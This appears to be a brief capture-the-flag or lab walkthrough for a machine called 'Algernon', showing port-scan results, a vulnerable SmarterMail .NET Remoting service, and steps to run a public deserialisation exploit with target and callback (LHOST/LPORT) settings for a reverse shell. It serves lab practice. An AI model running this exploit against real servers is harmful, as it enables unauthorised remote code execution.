Algernon

9998/tcp  open  http          Microsoft IIS httpd 10.0
17001/tcp open  remoting      MS .NET Remoting services

There is a SmarterMail v17 service on 9998.

SmarterMail Build 6985 - Remote Code Execution

https://www.exploit-db.com/exploits/49216

SmarterMail before build 6985 provides a .NET remoting endpoint
which is vulnerable to a .NET deserialisation attack.

Edit relevant parts of the exploit file.

HOST='192.168.157.65'
PORT=17001
LHOST='192.168.49.157'
LPORT=80

$ python3 49216

Last updated 4 years ago